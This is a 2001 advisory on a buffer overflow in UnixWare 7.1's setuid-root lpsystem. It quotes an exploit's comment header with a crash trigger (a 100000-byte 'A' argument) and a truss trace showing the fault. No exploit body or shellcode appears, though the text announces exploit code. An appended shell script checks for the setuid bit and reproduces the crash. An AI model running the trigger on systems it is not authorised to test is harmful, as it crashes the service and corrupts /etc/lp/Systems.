SCO UnixWare 7.1 ships '/usr/sbin/lpsystem' setuid root (owner root, group lp, as the listing below shows), and a buffer overflow in its handling of the command-line argument allows any local user to gain root privileges. The truss trace below shows the oversized argument being appended to /etc/lp/Systems and the process then faulting on address 0x41414141, i.e. control data overwritten with the 'A' bytes of the argument. The following is exploit code that can be used by administrators to verify whether they are vulnerable.
Credit:
The information has been provided by al3x hernandez.
Exploit:
/**
** UnixWare 7.1 LPsystem Xploit BufferOverflow
**
** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
**
** Special Greets to: White-B, Pablo S0r & Paco Spain.
**
**
** Technical Details:
**
** # ls -la /usr/sbin/lpsystem
** ---s--x--x 1 root lp 41840 Ap 4 998 /usr/sbin/lpsystem
** #
** # /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
** Segmentation Fault - core dumped
** #
**
**
** Mapped with truss:
**
** # truss /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
**
** [...]
**
** read(3, " A A A A A A A A A A A A".., 1032) = 1032
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, " A A A A A A A A A A A A".., 1032) = 1032
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, " A A A A A A A A A A A A".., 1032) = 475
** write(4, " A A A A A A A A A A A A".., 1023) = 1023
** read(3, 0x0830B740, 1032) = 0
** close(3) = 0
** write(4, " A A A A A A A A A A A A".., 549) = 549
** close(4) = 0
** rename("/etc/lp/lpdatAAA00012y", "/etc/lp/Systems") = 0
** lvlfile("/etc/lp/Systems", 2, 0x07F53C5C) Err#89 ENOSYS
** open("/etc/lp/Systems", O_WRONLY|O_APPEND, 0664) = 3
** fcntl(3, F_SETLK, 0x07F53C2C) = 0
** fcntl(3, F_GETFL, 0x00000009) = 9
** lseek64(3, 0, 2) = 1542283
** write(3, " A A A A A A A A A A A A".., 1000000) = 1000000
** write(3, " : x : - : s 5 : - : 1 0".., 20) = 20
** close(3) = 0
** lvlfile("/etc/lp/Systems", 2, 0x07F53C90) Err#89 ENOSYS
** xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F53344) = 0
** open("/var/spool/lp/fifos/FIFO", O_WRONLY|O_NDELAY, 0) = 3
** close(3) = 0
** xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F533E0) = 0
** open("/var/spool/lp/fifos/FIFO", O_RDWR, 0) = 3
** ioctl(3, I_CANPUT, 0x00000000) = 1
** getgid() = 103 [ 103 ]
** getuid() = 0 [ 0 ]
** Incurred fault #6, FLTBOUNDS %pc = 0x08072410
** siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
** Received signal #11, SIGSEGV [default]
** siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
** *** process killed ***
**
** Download the patch from SCO's page http://www.sco.com
** Bug reported 04-OCT-2001 and published on security
** pages 08-OCT-2001.
**
** Modify this c0de for your own personal use :-)
**/
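As an added check, not part of the original advisory or the author's exploit code: a POSIX sh script that classifies the permission bits of /usr/sbin/lpsystem the way the listing above is read (an 's' in the owner-execute slot of a root-owned file means setuid root), and wraps the crash trigger from the technical details with a backup of /etc/lp/Systems, since the truss trace shows the oversized argument being appended to that file before the fault. The function names (classify_ls_line, check_lpsystem, reproduce_crash) and the --check/--crash flags are my own, and the `ls -l` field layout "mode links owner group size date name" is assumed to match the listing.

```shell
#!/bin/sh
# Added example, not part of the original advisory or Alex Hernandez's code.
# Assumptions: a POSIX sh, an `ls -l` layout of "mode links owner group size
# date name" (as in the advisory's listing), and perl for the crash trigger.

# Classify one `ls -l` line as setuid-root, setuid-<owner>, or no-setuid.
# The 4th character of the mode string is the owner-execute slot; an 's'
# (or 'S' when execute is off) there means the setuid bit is set.
classify_ls_line() {
    set -- $1          # split the line on whitespace into positional parameters
    mode=$1
    owner=$3
    case "$mode" in
        ???[sS]*)
            if [ "$owner" = root ]; then
                echo setuid-root
            else
                echo "setuid-$owner"
            fi
            ;;
        *)
            echo no-setuid
            ;;
    esac
}

# Print the classification of the lpsystem binary (default path taken from
# the advisory). Returns 1 if the file is absent, 0 otherwise.
check_lpsystem() {
    bin=${1:-/usr/sbin/lpsystem}
    if [ ! -e "$bin" ]; then
        echo "missing: $bin"
        return 1
    fi
    classify_ls_line "$(ls -ld "$bin")"
}

# Reproduce the crash from the technical details. CAUTION: the truss trace
# shows the 100000-byte argument being appended to /etc/lp/Systems before the
# fault, so the file is backed up first. Do not run this on a production
# print server; a status of 139 (128+11) means the child died of SIGSEGV.
reproduce_crash() {
    cp /etc/lp/Systems /etc/lp/Systems.bak || return 1
    /usr/sbin/lpsystem "$(perl -e 'print "A" x 100000')"
    status=$?
    echo "lpsystem exit status: $status (139 = 128+SIGSEGV on POSIX shells)"
    return $status
}

# Usage: sh lpsystem_check.sh --check [path]    or    sh lpsystem_check.sh --crash
case "${1:-}" in
    --check) check_lpsystem "${2:-}" ;;
    --crash) reproduce_crash ;;
esac
```

Only the --check path is safe to run routinely; a result of setuid-root on an unpatched system is the condition the advisory describes, and the fix is SCO's patch rather than removing the setuid bit by hand, since lpsystem needs root to update /etc/lp/Systems.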